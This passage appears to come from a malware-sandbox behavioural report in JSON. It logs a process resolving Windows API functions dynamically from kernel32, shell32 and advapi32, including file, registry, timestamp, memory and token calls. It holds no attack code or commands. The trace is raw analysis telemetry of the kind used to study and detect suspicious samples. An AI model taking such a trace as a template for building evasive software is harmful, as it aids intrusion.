"status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateFileA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833a0" } ], "repeated": 0, "id": 769 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075bb", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 770 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075be", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateFileW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833b0" } ], "repeated": 0, "id": 771 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075cf", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 772 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075d2", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetFileSize" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758835d0" } ], "repeated": 0, "id": 773 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075e3", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 774 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075e6", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ReadFile" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883730" } ], "repeated": 0, "id": 775 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075fa", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 776 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004075fd", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetSystemDirectoryA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75878480" } ], "repeated": 0, "id": 777 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407611", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 778 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407614", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetSystemDirectoryW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75881350" } ], "repeated": 0, "id": 779 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407622", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 780 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407625", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetFileAttributesW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758837a0" } ], "repeated": 0, "id": 781 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407636", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 782 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407639", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "MoveFileExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758799b0" } ], "repeated": 0, "id": 783 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040764f", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x75c40000" } ], "repeated": 0, "id": 784 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407652", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "shell32.dll" }, { "name": "ModuleHandle", "value": "0x75c40000" }, { "name": "FunctionName", "value": "SHGetSpecialFolderPathW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75db1050" } ], "repeated": 0, "id": 785 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407668", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "shell32.dll" }, { "name": "BaseAddress", "value": "0x75c40000" } ], "repeated": 0, "id": 786 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040766b", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "shell32.dll" }, { "name": "ModuleHandle", "value": "0x75c40000" }, { "name": "FunctionName", "value": "SHGetSpecialFolderPathA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75ef7850" } ], "repeated": 0, "id": 787 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040767e", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 788 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407681", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegOpenKeyExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf120" } ], "repeated": 0, "id": 789 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407691", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 790 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407694", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegOpenKeyExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76eceec0" } ], "repeated": 0, "id": 791 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076a1", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 792 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076a4", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegQueryValueExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecef60" } ], "repeated": 0, "id": 793 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076b7", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 794 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076ba", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegQueryValueExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecedf0" } ], "repeated": 0, "id": 795 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076c7", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 796 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076ca", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegSetValueExA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ed05d0" } ], "repeated": 0, "id": 797 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076d7", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 798 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076da", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegSetValueExW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf100" } ], "repeated": 0, "id": 799 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076e7", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 800 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076ea", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "RegCloseKey" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf030" } ], "repeated": 0, "id": 801 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076fb", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 802 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004076fe", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CreateDirectoryW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883380" } ], "repeated": 0, "id": 803 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040770c", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 804 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040770f", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "Sleep" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758811a0" } ], "repeated": 0, "id": 805 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407720", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 806 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407723", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetFileTime" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758835f0" } ], "repeated": 0, "id": 807 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407731", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 808 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407734", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "SetFileTime" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758837e0" } ], "repeated": 0, "id": 809 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407742", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 810 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407745", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CopyFileW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883a50" } ], "repeated": 0, "id": 811 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407759", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 812 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040775c", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "DeleteFileW" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758833e0" } ], "repeated": 0, "id": 813 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407770", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 814 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407773", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "ExitProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75886a10" } ], "repeated": 0, "id": 815 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407781", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 816 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407784", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "VirtualAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x7587f660" } ], "repeated": 0, "id": 817 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407798", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetDllHandle", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "kernel32.dll" }, { "name": "ModuleHandle", "value": "0x75860000" } ], "repeated": 0, "id": 818 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040779b", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetTickCount" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75882640" } ], "repeated": 0, "id": 819 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077ae", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 820 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077b1", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCurrentProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758830f0" } ], "repeated": 0, "id": 821 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077be", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 822 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077c1", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GlobalAlloc" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75880890" } ], "repeated": 0, "id": 823 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077ce", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 824 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077d1", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "OpenProcessToken" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecef40" } ], "repeated": 0, "id": 825 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077e4", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 826 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077e7", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "GetTokenInformation" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76eceba0" } ], "repeated": 0, "id": 827 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077fa", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 828 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x004077fd", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "AllocateAndInitializeSid" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ecf4a0" } ], "repeated": 0, "id": 829 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407810", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 830 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407813", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "EqualSid" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ed07e0" } ], "repeated": 0, "id": 831 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407826", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "advapi32.dll" }, { "name": "BaseAddress", "value": "0x76eb0000" } ], "repeated": 0, "id": 832 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407829", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "ADVAPI32.dll" }, { "name": "ModuleHandle", "value": "0x76eb0000" }, { "name": "FunctionName", "value": "LookupAccountSidA" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x76ef8100" } ], "repeated": 0, "id": 833 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040783c", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 834 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040783f", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "CloseHandle" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x75883150" } ], "repeated": 0, "id": 835 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040784c", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 836 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x0040784f", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": true, "return": "0x00000000", "arguments": [ { "name": "ModuleName", "value": "KERNEL32.DLL" }, { "name": "ModuleHandle", "value": "0x75860000" }, { "name": "FunctionName", "value": "GetCurrentProcess" }, { "name": "Ordinal", "value": "0" }, { "name": "FunctionAddress", "value": "0x758830f0" } ], "repeated": 0, "id": 837 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407862", "parentcaller": "0x00409be6", "category": "system", "api": "LdrLoadDll", "status": true, "return": "0x00000000", "arguments": [ { "name": "Flags", "value": "0x00000000" }, { "name": "FileName", "value": "kernel32.dll" }, { "name": "BaseAddress", "value": "0x75860000" } ], "repeated": 0, "id": 838 }, { "timestamp": "2025-03-02 21:32:29,925", "thread_id": "4148", "caller": "0x00407865", "parentcaller": "0x00409be6", "category": "system", "api": "LdrGetProcedureAddressForCaller", "status": 